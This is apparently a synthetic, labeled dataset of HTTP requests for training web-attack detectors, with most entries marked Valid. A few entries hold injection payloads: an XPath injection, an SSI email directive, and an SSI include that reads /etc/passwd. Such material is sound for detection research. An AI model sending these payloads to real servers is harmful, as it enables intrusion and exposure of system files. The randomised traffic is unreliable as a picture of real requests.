Cookie: deyIs=oduoue;alasteh8oahshie=3930453;oaeNmsseteeb=o\style8fn16selectittsbgsoundp$u5;Iu=w nc6phptsn;zTn=abodyl8ef;oeategih=r eNo
Cookie2: $Version="443"
Date: Tue, 11 Oct 05 16:55:23 CET
ETag: "WILM38mkEG2SO7@POY"
Expect: hhrmhd=rphdd;asdd=medas
If-Modified-Since: Thu, 03 Jan 08 19:55:25 CET
If-Unmodified-Since: Sun, 18 Nov 07 18:05:10 UTC
If-None-Match: *
If-Range: *
Max-Forwards: 4535
MIME-Version: 8.3
Pragma: 2=eihht
Proxy-Authorization: Digest nonce
Authorization: Basic d25Jcm46ZWlkY3ZM
Range: -55067
Referer: /dnbMe.cgi
TE: trailers,gzip
User-Agent: imlu (jiIc0g.3; ngjdkRgbsd; f@sbIqs; nsdbBo7QqV)
UA-Disp: 036,845,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 062x6317
Via: 8.5 120.88.245.175, 7.6 www.l5wie8.htm
Transfer-Encoding: identity
Upgrade: ovle/8.4, aroHm/4.2
Warning: 897 250.38.91.23:5 "auyT" "Wed, 26 Oct 05 13:46:39 UTC"
X-Forwarded-For: 136.245.189.109
X-Serial-Number: 55795183768
~~~~~: ~~~~~~~~~~~~

null

End - Id: 39132
Start - Id: 22597
class: Valid
GET /5UeoGowdlntpeeaipt/h1E/gheEpoanxse/hLuQkbR_nIABwZcEK/ok8XduQZ/5Xdwukr9wgethFNG/nPAdl/nyxiNo.js?TuttghDojsnia=74&xXY7v5qm=16298&bmuig=tm8vatdyaalas&nwdixep2uxm=567&eeost5xz9jldao=tryfig&arrgaeo3tt=oEsiknaUr7caTa&cgWva=sz+0tuetcartydr&Eqaergtbpil=bgsoundyntt%5C+mmt8&V7UNaxF-=wiuulirIallnetc&YiiotomOh=ehdi2ee&2irqshrnFdo=+astyle&dsus=755628&stteamntnrtg3=nacosanAriay&Ban=mXX6l&a9eedsiTjoA2=r HTTP/1.1
Host: www.s0s0hsnoo.st:28
Connection: keep-alive
Accept: text/plain;q=0.4, image/*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: ediusvno='tufftMk'
Client-ip: 226.179.232.156
Cookie: im37nTalbr5rf9=|toeen2W8wr;telnetzidHs=8126
Cookie2: $Version="7"
Date: Mon, 14 Sep 09 22:45:55 UTC
ETag: "z66DM2XBFBBcVxrLfxO"
Expect: 100-continue
From: tamegP8@NaDasMP.be
If-Modified-Since: Fri, 01 Feb 08 20:23:34 UTC
If-Unmodified-Since: Thu, 20 Sep 07 11:02:11 CET
If-Match: "PFdEDNdjjH6X_px.GLOj"
If-None-Match: *
If-Range: Sat, 03 Dec 05 10:53:48 CET
Max-Forwards: 937
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: nrtei onnr=ngsfiYie
Authorization: Digest realm
Range: 5-,-1
Referer: http://www.5ia4taf.be/ldo2bin/nxxs/eodtmthp/e2otmhed/e9ehau.avi
TE: trailers,chunked;q=0.6,chunked
Trailer: Expect
User-Agent: Mozilla/2.7 (compatible; elieocrs; Mac OS X; dnlmint)
UA-CPU: MIPS
UA-Disp: 9434,874,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6216x6265
Via: uaRrz7/5.4 www.osPrT.tiff, HTTP/5.9 165.9.10.152:3584
Transfer-Encoding: cErt; tisy=uusi
Upgrade: txsikk/4.1, hnh/1.7, bte/4.1, eAsee/7.7, Ei7rcc/1.1
Warning: 649 www.3snl9.jpg:7772 "cetphelatiyt" 
X-Forwarded-For: 5.120.156.102
X-Serial-Number: 8769415
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22597
Start - Id: 5318
class: Valid
PUT /sAvZ4/ne8aqthRs/aiReVcttOtsnaemfee/3oTnh3tdiw/mSzX/IOC09/egbu6/hL/hG.asp? HTTP/1.0
Content-Length: 191
Content-Language: dtrlo,ei9oa
Content-Encoding: deflate
Content-Location: http://tm42tmep.it/itqmpaes/tewira.js
Content-MD5: aHBoY29EaUR0a2V0ZmFzOA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Jan 07 24:03:56 GMT
Last-Modified: Thu, 22 Dec 05 14:44:03 GMT
Host: 114.172.206.63
Connection: wsdteot
Accept: text/*;q=0.7
Accept-Charset: iso-8859-3, x-mac-ce, windows-1252;q=0.1
Accept-Encoding: 
Accept-Language: hesa-ioRTeea;q=0.9
Cache-Control: no-store
Client-ip: 250.143.222.249
Cookie: yeneudinh57=er2CrR5m+ra;otobatx9z=285325;ttOg3ryihewwuiu=6rhzs8ckwgetn
Cookie2: $Version="95"
Date: Fri, 02 Apr 10 17:33:31 GMT
ETag: "152va90sIrK.1Oj_ALtg"
Expect: enfl
From: hsviii@dds6i8NT.ch
If-Modified-Since: Tue, 13 May 08 16:09:27 UTC
If-Unmodified-Since: Fri, 23 Jan 09 04:08:39 CET
If-Match: "GeN00xtUP9l52vbaNp8"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic cmltcU06SDNyb3Jl
Authorization: Digest username="sKad"
Range: 8822-34,539805-
Referer: /rru2ufry/sooiiwot/ssrras/yben/hoPh7k.jsp
TE: trailers
Trailer: Date
User-Agent: Mozilla/9.5 (Machintosh; U; PPC Mac OS X 5.9; ts-ue; rv:3.4.3) Gecko/50338459
UA-CPU: MIPS
UA-Disp: 370,737,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4339x4945
Via: 7.8 217.9.119.114:842, 3.7 29.7.254.205
Transfer-Encoding: deflate
Upgrade: Oce/9.1, a2s/1.1, m5nav/1.5
Warning: 001 www.sds01n.jpg "1Ioysiaieh0EvlxdpDae" "Sat, 29 Apr 06 19:48:47 UTC"
X-Forwarded-For: 194.87.49.44
X-Serial-Number: 6090087986849
----: -----------------------------
~~~~~: ~~~~~~~~~~~

x5betweenfiWRob9XD=65797583&shehau=dS p-opodn&Zru0EMRcbpsbp=sEko.n3&ta3i=ii2update me97&1shaheDet1lh3=epdt&jWsPZXJKsgE=leesea&dgEgArerr4hesS=lexidot7rlyatq&@whtpass9=4&siaenm7ossiqRib=etsl60a

End - Id: 5318
Start - Id: 4583
class: Valid
POST /ea1I4znsedeahP6/hb/ujhhjnsAa/roxchsiryeSteif5/@yinclude4G@SPGWDnV6exec/fdDccrnMIiiceglvh/xefVftpNLlsdscript_/etow.html? HTTP/1.1
Content-Length: 172
Content-Language: et
Content-Encoding: compress
Content-Location: /Saoy7o/emoatp9/pehz/tNlxai.tar
Content-MD5: cjhyaTNoaGFsRW9zZGFscg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Sep 05 01:40:53 CET
Last-Modified: Sun, 03 Sep 06 14:15:55 UTC
Host: 160.144.44.225:3
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ndsFgssf-hgccfdr, e-dmnnE, zrawirv9-et;q=0.9
Cache-Control: only-if-cached
Client-ip: 159.41.146.40
Cookie: xwdeytaitn7Tr=4103356
Cookie2: $Version="006"
Date: Fri, 09 Feb 07 11:12:11 UTC
ETag: W/".KYKaS._Rs4Pa6eMf"
Expect: Ioowfsh=eukgain6
From: a5wn@h3Rit.be
If-Modified-Since: Sat, 09 Oct 04 24:53:39 GMT
If-Unmodified-Since: Thu, 24 Apr 08 02:42:01 UTC
If-Match: "Ldan5XskSURV@GJ.e_"
If-None-Match: "k1Flc4yLGMgJmo4Y0y"
If-Range: Thu, 03 Sep 09 08:48:11 GMT
Max-Forwards: 79
MIME-Version: 6.2
Pragma: dt5nbwt='omat0k'
Proxy-Authorization: qkktsv 2oai=91eto
Authorization: NTLM ZWQzb0lpcm1lNmV3dHNudHJuZ25YOUllbnlmb3lYeGVuck8y
Range: -6763
Referer: /hdt7sU9N/uspm/vmvm/mesea2r/nn5e6kie.bin
TE: trailers,deflate;q=0.5,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.4 (Machintosh; U; PPC Mac OS X 7.8; so-2T; rv:5.6.3) Gecko/75441739
UA-CPU: StrongARM
UA-Disp: 067,349,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1436x3813
Via: 5.5 www.secztCr.gif, 8.5 236.198.68.109
Transfer-Encoding: deflate
Upgrade: ixu/5.5
Warning: 520 www.1weN3tt.js "tnnre9haoghuxhIda3e" "Fri, 07 May 04 09:34:48 CET"
X-Forwarded-For: 210.240.131.9
X-Serial-Number: 9967522166
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

drrsa=6316354&yt=3721&nsrcrtzttote1n=p&rnunnrznsUrm2u=Isspf7eihutpassthruca&3rcpTzWoA=tWZF&haEtEisnimaseT9=18&lNrtstSEt=i)~tmp/eta&yhn=mL0gArETNx&ed5as=rwtservicesopt

End - Id: 4583
Start - Id: 19348
class: Valid
GET /h12jzPrmDjstdine/loeHafgedhoito.htm?o1HusbnegcAe1=lF4&sdoydIa7uis=4378064&sDtzae2pltone=satoDs5jle3tluT&5Q8u2=8366075&treof=9812857 HTTP/1.0
Host: www.rIut.com:90
Connection: close
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ueky9omi-td8asre, qn2murtt-sWiei, to2-y8hhrigw, x-bosF;q=0.3, icr-cr2l
Cache-Control: tucl=i1
Client-ip: 210.226.84.255
Cookie: Rieylohsu4i=6907;ce4hwuhinpEtkZ=02309;8hrzit=nkjHEZHZk;lanRev=EProO80
Cookie2: $Version="84"
Date: Mon, 20 Sep 04 13:01:27 CET
ETag: "a2YDbXVj7A6.vSq80bLA"
Expect: N1nheiin
From: q8nm@dnhqn.uk
If-Modified-Since: Thu, 29 Nov 07 08:19:42 CET
If-Unmodified-Since: Tue, 11 Mar 08 18:17:22 CET
If-Match: "5QSDPGib24bVjH@cupf9"
If-None-Match: "U5sGFzOb-gf9.DB58eAs"
If-Range: *
Max-Forwards: 5
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM b2FvempTSWhuOWVtcWlvaXU4dGszaXVpbGVpaXJwZUFtaGkzYWxhdHN0UmVuRg==
Authorization: Basic aG5pc2VTMzpsMW4wMHM=
Range: 0-6218,62-,-50681
Referer: /9ls3ls/nhfde/ncrre/iree7.jpeg
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/0.6 (Machintosh; U; PPC Mac OS X 8.0; bu-sN; rv:0.3.2) Gecko/08903292
UA-CPU: StrongARM
UA-Disp: 521,2538,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 352x2255
Via: FTP/7.1 www.eeeaA.htm:7749
Transfer-Encoding: gzip
Upgrade: aTrdtn/5.5, drrU/7.9, dWr/1.4
Warning: 807 www.ndncvohd.html "snOcrN" 
X-Forwarded-For: 83.53.98.240
X-Serial-Number: 0947873125180577061
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19348
Start - Id: 33393
class: Valid
PUT /pQ-sBVIi9Anm4A/w98/oUlV9YFEfdi_tX_/camxik7etorua6/5Tjm/i0c@@/f9zyy/dssnsih6ioKznva2nt/msSatceoaSoaQctix.jsp? HTTP/1.1
Content-Length: 106
Content-Language: 1v,ctnQ
Content-Encoding: deflate
Content-Location: http://www.AdQmidaq.com/redne/eeaeneis.gif
Content-MD5: ZWVlYW9zRDBsVGlvYW5zeg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Apr 04 21:50:56 UTC
Last-Modified: Thu, 24 Feb 05 02:13:05 UTC
Host: www.ecieta.org
Connection: keep-alive
Accept: image/gif;q=0.6, image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: r-dopaeEhe;q=0.1
Cache-Control: only-if-cached
Client-ip: 87.155.255.84
Cookie: sezt=hblase7seyq8rrhhl
Cookie2: $Version="1"
Date: Wed, 07 Sep 05 24:42:30 UTC
ETag: "UmjwvoXg.Eb.5vHT"
Expect: ea87te
From: ooydtlh@tuohEicue.de
If-Modified-Since: Wed, 05 Dec 07 13:41:13 CET
If-Unmodified-Since: Sat, 12 Apr 08 17:03:57 UTC
If-Match: "ynDFOhKCXQwmA4fpbz"
If-None-Match: "bkxmu6az1RGc61TrOBd"
If-Range: *
Max-Forwards: 462
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 7289-656,71-060150
Referer: /gnr7io/Ngara/nnhe86nd/ornvksT/er4wisol.fgf
TE: trailers
Trailer: Range
User-Agent: rRL6lJ9OO http://www.aaeaaiTt.uk
UA-CPU: x86
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 811x2728
Via: FTP/4.0 164.252.51.122, 9.8 www.ti4v.tiff
Transfer-Encoding: compress
Upgrade: wcd8/1.3, hwe/0.4, aash/9.8, EsA/2.8
Warning: 454 98.218.12.151:008 "6Oim04" "Sat, 06 Nov 04 21:21:33 UTC"
X-Forwarded-For: 203.185.55.62
X-Serial-Number: 93235551323019151899
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Tns9idn=845810152&jticqseLseqUs=840&yCle8sOH=t/r9&IS=8accept4wsodivdocument&lg=v  ;&ohsameamsahai8=0dE

End - Id: 33393
Start - Id: 48496
class: XPathInjection
POST /bp7Xe3vHADb7_iUphT/chreqtaVzc9acOltit/sLeh1/ctmbtq/R9group byl4bcb/wtur3l/s0ouTciatj/dMD.html? HTTP/1.1
Content-Length: 189
Content-Language: wlw
Content-Encoding: compress
Content-Location: http://ldegoy.com/rheeyni/nhIuaon.wav
Content-MD5: b2RlbGhvaWFhaTdia01mYg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Nov 05 16:04:05 CET
Last-Modified: Sun, 23 Apr 06 02:18:15 CET
Host: 173.152.127.84
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: g-2o;q=0.9, h1tt-jto1a9
Cache-Control: min-fresh=4
Cookie2: $Version="8"
Date: Wed, 28 Nov 07 11:38:55 CET
From: numhoTo@rsni1ore.com
If-Modified-Since: Sat, 11 Aug 07 05:09:27 GMT
If-None-Match: "Z989yHaJOyFT2C5a99i@"
Max-Forwards: 922
Authorization: Basic TnRlc2VjZnM6M2hydWRnYQ==
Referer: /gure/24ussnl7/heNY/uiitaon.exe
TE: trailers
User-Agent: Mozilla/9.9 (Windows; U; Windows NT 3.4; de-sr; rv:9.6.6) Gecko/91624564
X-Serial-Number: 01871

ebabmkTknaess=pra']    |    P     | //user[ name/text( )  =  'ftfe&oRutnr4ele=g$y&urie7ddsho4le=09&4nuieti=sswtttet&3tyMswt=%e&e0oxTg1hdxome5=s6n&ir1lE=128781790

End - Id: 48496
Start - Id: 8236
class: Valid
GET /hsZPu_2V.jpg?Erfd2nc=+&riewer=bgsoundlpoo&ebaehanohgpesbm=300157&Wreplacey@dJd7DW=tD3mZmEcltue&T7Eipeddt=e&akermoh4=O&il=8&pUrCvFdlJr=n%3Cia5um HTTP/1.1
Host: www.4oaepneo4r.net
Connection: keep-alive
Accept: application/rtf, application/*;q=0.1, text/*;q=0.9
Accept-Charset: iso-8859-8, iso-8859-9, windows-1252;q=0.1, iso-8859-2;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 245.120.27.245
Cookie: r24iInbomwqlp=75252946;tbenam4oyroli=Oitosae0fqo;iftinhwto=225824239;m.@ia.EL_K=385303
Cookie2: $Version="558"
Date: Wed, 02 Mar 05 07:16:36 GMT
ETag: "55@WDB@bKuDlow7@p"
Expect: 100-continue
From: seep8@iavee.it
If-Modified-Since: Thu, 01 Jul 04 12:55:52 UTC
If-Unmodified-Since: Fri, 18 Aug 06 14:42:55 UTC
If-Match: "oZVeOwdn.7bAGU1"
If-None-Match: "KEC9vY-O.MFnXqX@1"
If-Range: Fri, 24 Nov 06 18:16:57 UTC
Max-Forwards: 1201
MIME-Version: 9.7
Pragma: 7n='seosro'
Proxy-Authorization: Basic ZWQ2M3Q6ZWlsYw==
Authorization: ccee V9emtoce=lrpi
Range: 62861-,40-66
Referer: /adt5n/tets.jsp
TE: trailers,deflate
Trailer: Pragma
User-Agent: Mozilla/5.8 (Windows; U; Windows NT 4.3; ae-on; rv:8.1.8) Gecko/79296891
UA-CPU: StrongARM
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8997x816
Via: HTTP/7.2 127.36.172.7, aHdsus/6.9 www.ey3r.shtml, 0.8 www.ueefhtnc.css
Transfer-Encoding: identity
Upgrade: ib6Ex/5.7, aZse/0.7
Warning: 350 www.rvsnz.jpg "iihmtwbmshrEsre" "Tue, 20 May 08 02:04:29 UTC"
X-Forwarded-For: 176.93.53.162
X-Serial-Number: 9806136470509307613
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 8236
Start - Id: 13444
class: Valid
GET /lQ/rne/aEopodoic.mdb?vUqdbatojStrt2Z=tjzaewhyeotr6h9&tn=7&os5tt=7&aB9y5=nFwVBxtkZk54&lmgfG6aonftn=439&tddiloeejai=Eolerrnlebtl&T6afmwh=79491 HTTP/1.0
Host: 14.206.215.8:1
Connection: close
Accept: video/quicktime;q=0.7, text/xml
Accept-Charset: windows-1255
Accept-Encoding: deflate, deflate;q=0.0, gzip;q=0.1
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 61.236.0.64
Cookie: iaOcG=197661;sdkt=86;d8kh=90473;hdaz7tgLi=068348880
Cookie2: $Version="4"
Date: Tue, 29 Dec 09 19:06:12 CET
ETag: W/"r5D2Ulp23chcWD9A"
Expect: Di1na=l6eprjet
From: onWi@fbwst.st
If-Modified-Since: Wed, 28 Jul 04 08:23:46 CET
If-Unmodified-Since: Sat, 08 Sep 07 13:42:15 CET
If-Match: "jOrut7OsFyJx5S9tbJY@"
If-None-Match: *
If-Range: Thu, 18 Nov 04 23:43:46 GMT
Max-Forwards: 79
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM c29lb25mYXNyc25sc29uZUJkb2F4b2FlczBqRWxOck50cHJsaQ==
Authorization: eNaDNK crur=mos2nl
Range: -20257
Referer: http://lFhgt37n.net/xzjbeex/ekoGuA/redag.gz
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/9.8 (Windows; U; Win 9x 5.5; co-Nx; rv:2.9.5) Gecko/09748180
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9732x9138
Via: Wec/8.6 www.adft.tiff:132
Transfer-Encoding: EsNvt
Upgrade: gau/6.0
Warning: 920 www.ehremu.htm "dpln5trioiep" 
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 564796261351412431
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13444
Start - Id: 13436
class: Valid
GET /9jiay6kr/1BSI-Xu0KLoU6by/hTMW/nBnBpx/ypmaEthEs/ithrr7Ha5e/iYU9gCGR5Gce/Wte/viY0/pkvbscriptpassthruNV8Wb3Awinntc.X.mspx?czaeat0d7eu=1475629&inzoee=8Csa7mhk&p6=o9PxkhlJXG&esaediolhoeu=%2BdvneEi HTTP/1.1
Host: www.oeijtsysR.net
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: agse-Ismabe;q=0.1, geS-e, cugiy1eS-Aso, fjejIs-hiAVhner;q=0.3
Cache-Control: no-store
Client-ip: 148.219.86.208
Cookie: bmh=hO8rey@cvpj;8tmrxtu4b=79885
Cookie2: $Version="50"
Date: Sat, 29 Oct 05 02:49:48 CET
ETag: W/"cAVI@vuiXnK-wTp8"
Expect: ert7Te=r2qane;oyn2p=eexi
From: un9t@rthc.be
If-Modified-Since: Sat, 03 Jan 09 06:21:55 GMT
If-Unmodified-Since: Sat, 18 Oct 08 12:34:10 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 24 May 05 24:59:06 GMT
Max-Forwards: 229
MIME-Version: 0.5
Pragma: 3e00sqo=tyafSw4b
Proxy-Authorization: NTLM bGFlYXpvOW50b29zOXRhamVhZWVvcmlmU0Fydmh0dFk=
Authorization: NTLM bXBlaHQ4M3BoZWF4ZmVlYnBlN2FhRUUzc250dzUwaWVxZTBycm8ybGlzZjBB
Range: -61196,755-,-603766
Referer: /izuie.sh
TE: chunked;q=0.5
Trailer: Authorization
User-Agent: dabguixi/2.7.6.9.1
UA-CPU: x86
UA-Disp: 507,141,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9732x9138
Via: 5.1 www.ath4noed.png, rdi/2.4 www.wiAaxa.html, FTP/1.8 www.o8spVmL.html
Transfer-Encoding: identity
Upgrade: gau/6.0
Warning: 040 www.md2Oee7.html "8eDFiNdsrzhsqhjpn7d" 
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 8913868514720115974
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13436
Start - Id: 39431
class: SSI
GET /6r2s/T6eE9teeiciEz/36a0FtmpTzU/sd6C8B2IzJ/rrteS/hu0o06og/eKLM-QhFEEFw0k/INKWJItOm/yetnseditcenrfir/Oc29a5hieUerelLm3/oSPy6yslxhUGD1u.pI.cfm?8ci=5336212&r5myesbt0=8169287&l6iTesHn4=%3C%21--%23email+fromhost%3D%22www.cwnuoie.com%22+tohost%3D%22mailbox.mCe.com%22+message%3D%22o47seH+optcin+hie+noc%22+fromaddress%3D%22aeeda.com%22+toaddress%3D%22qaaca.na4tsr.com%22+subject%3D%22Es%22+sender%3D%22ab.com%22+replyto%3D%22hoinle.com%22+cc%3D%22et%22+inreplyto%3D%22Irae+dhdr+r%22+id%3D%22timail%22+--%3E&fsnrcVmhfOnE=tnodu&cth=8771475&ohted=rw&odu=pap%3E&Ona=%29qn%40dfli+l&daoonwFsaNne=t&bo=e0zTQIVv6bU&s6vc=7761050&jetado2nlEtca=ftpRvqna%3E++zTiaat&Ehht=l2i&hoEsxh=57&eaifeios2u6u=isji2bnsieosIra8 HTTP/1.0
Host: www.9txe.it
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: euc-jp;q=0.6, euc-kr;q=0.3, windows-1250;q=0.9
Accept-Encoding: gzip, identity, compress;q=0.1, identity, gzip
Accept-Language: rhRal-osoon;q=0.2, Flhtz-i3;q=0.8, nenmhe-iiab, enua-rhlkmie;q=0.8, sroc-3
Cache-Control: only-if-cached
Client-ip: 126.45.36.156
Cookie: knLlooep9ba4Aft=6e;dnxtaxnhinzmoPt=nsXy
Cookie2: $Version="308"
Date: Tue, 06 Sep 05 14:40:39 GMT
ETag: "-A3q_0z5h0Y@AJr8"
Expect: 100-continue
From: nitnd0Ry@sdsmmyeanh.ch
If-Modified-Since: Thu, 06 Dec 07 10:11:44 CET
If-Unmodified-Since: Sun, 20 Nov 05 16:43:22 UTC
If-Match: *
If-None-Match: "M.Ies..hvhPqNc8Ne9K"
If-Range: *
Max-Forwards: 00
MIME-Version: 4.7
Pragma: ht=hOmppd
Proxy-Authorization: rashN riiam=cssstki
Authorization: NTLM ZlNuZWUxaGE4cnJuaHBlQXJsZWVpb3RvZlVpNXFlY0VpaWFwbmU=
Range: -07524
Referer: /rLne.jsp
TE: trailers,deflate,chunked
Trailer: Transfer-Encoding
User-Agent: o9R.pTJN99 http://www.gawylo.fr
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 162x589
Via: ewgomt/6.2 www.mkltARel.htm, 8.3 www.1tngt.js, 1dhu/4.0 www.sfex.html
Transfer-Encoding: compress
Upgrade: Tnfr/9.0, twtet/7.7, sbse/4.5, iht/4.1, rei/1.4
Warning: 280 113.181.5.189:613 "neo5iip" "Wed, 20 Feb 08 05:16:28 CET"
X-Serial-Number: 7022355683967600
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39431
Start - Id: 39656
class: SSI
GET /peboroowisrweett3m7/r5t/bvatlvhrytlrt/tGn9hnsfIlTXXU91/enkrg/0s/rmgZOOeqFi/cpGi10f/uQRyIazeG-KlUsBiz/rh3loidnia/sdqEYbBYPWIg/oFHh535.tiff?haihm9g=%3C%21--+++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E HTTP/1.1
Host: 82.240.83.241
Connection: dmnoecyu
Accept: video/*
Accept-Charset: x-mac-hebrew;q=0.5, shift_jis;q=0.6, windows-1252;q=0.6, windows-1258;q=0.8, euc-tw;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 193.240.238.168
Cookie: dzO_W=hwvDiWxy
Cookie2: $Version="9"
Date: Sun, 18 Apr 10 16:31:50 CET
ETag: "bgzQc-vq1mgSf1lPiZg"
Expect: 100-continue
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Sun, 29 Feb 04 14:25:48 UTC
If-Unmodified-Since: Wed, 03 Oct 07 05:16:00 UTC
If-Match: "B@3VoxY.xDKOy5mo"
If-None-Match: *
If-Range: *
Max-Forwards: 8571
MIME-Version: 5.1
Pragma: 2itty='bbh2cj'
Proxy-Authorization: NTLM Mm41YzRyZ2VsbDdzbWxhdHRyeXRzbm1jaHNtc245aXQ=
Authorization: Basic YW5pb2J0Qzc6c01vZWNp
Range: -7190
Referer: /nslF0tn/bnilh/sw0otme6.dll
TE: trailers,trailers,chunked;q=0.0
Trailer: Authorization
User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 9.1; Mc-Nw; rv:4.5.6) Gecko/49141834
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8969x195
Via: FTP/3.9 45.117.3.147:0817, 2.3 43.75.210.7
Transfer-Encoding: gzip
Upgrade: o7s/5.6, dipl/2.7
Warning: 182 174.22.41.47 "UhdAhltnsetaa1re" 
X-Forwarded-For: 50.214.174.78
X-Serial-Number: 659531112
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39656
Start - Id: 9791
class: Valid
GET /ajyW3OEHKK4jM5/AsaooapsysRuaUEiPj/ejsveun.3/iq4eed.php3?cjmrema=39&TtE3Oa=d+&itd5qecbaJ2sd8=0342846920&hudujenEtbow=29&4ztn=paysOn1adtahmbed&wtli=dun%7Ca&oiwyFnutr2nnlzb=acV&xandW4=3&Bnrvhw=07090 HTTP/1.1
Host: www.layhO.com
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=53969
Client-ip: 142.252.165.176
Cookie: tna5l=5709607;eeeccr3jriht=4lp  ;tle:xl letsewp-m;a2l81o78c20bilg=lea;7Dn7fk17S2=5643
Cookie2: $Version="74"
Date: Fri, 19 Jun 09 09:11:30 GMT
ETag: "9QcqDrRniCsHj9Thro7"
Expect: i0hpyeh
From: irrTect@iIeralzbt.fr
If-Modified-Since: Sun, 26 Feb 06 15:18:57 UTC
If-Unmodified-Since: Wed, 26 Nov 08 07:31:25 CET
If-Match: *
If-None-Match: "Xj0nh9HZZcHG1ev"
If-Range: Wed, 12 May 04 09:08:42 CET
Max-Forwards: 0
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: IsiUr 6twklat=tyei
Authorization: Ttrts tNc3tO=idhOt
Range: 32-
Referer: /r8rxp/neetee/infosTd/tdvyty.css
TE: deflate;q=0.1,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/3.5 (Windows; U; Win98 6.3; t2-s1; rv:1.8.0) Gecko/07388523
UA-CPU: PowerPC
UA-Disp: 152,310,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 493x9189
Via: 2.5 www.4rhns.js, HTTP/5.6 www.3eao.jpg, 8.3 www.mxbja.html
Transfer-Encoding: identity
Upgrade: cds2Qc/0.8, daru/8.7, roew/2.1, hnm/9.5, saile/8.5
Warning: 928 www.ocTt.htm:04221 "zlt2ebnora" 
X-Forwarded-For: 215.67.208.226
X-Serial-Number: 3012101828224515543
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9791
Start - Id: 11073
class: Valid
GET /itsauAaKY2DfO@/tdsOl7ei/8DrpugA7eCnshbs.css? HTTP/1.0
Host: 67.169.101.148:80
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: fh1elR-rerh, Eaobbca-r, sdinae-axnanh;q=0.1, t-Stan, aeet-y0y4r
Cache-Control: no-transform
Client-ip: 214.74.209.201
Cookie: zndDsoeeoacw=~ss[nlsA:zg(d
Cookie2: $Version="39"
Date: Sun, 14 Dec 08 15:08:19 UTC
ETag: "jx7Jdr25L6N7_wIFLjl"
Expect: e0vMye0E
From: irc6ruhx@rhorr.ch
If-Modified-Since: Fri, 10 Nov 06 01:06:52 UTC
If-Unmodified-Since: Sat, 30 Jun 07 14:05:43 GMT
If-Match: *
If-None-Match: "dLDcnR5tqKnwSpQNrCE2"
If-Range: Mon, 27 Mar 06 06:10:42 GMT
Max-Forwards: 205
MIME-Version: 6.1
Pragma: taadeue=dhhzW
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest nonce
Range: 240-
Referer: http://www.eoeNn.org/is3bdm/itoezms/eunasa.zip
TE: trailers
Trailer: Via
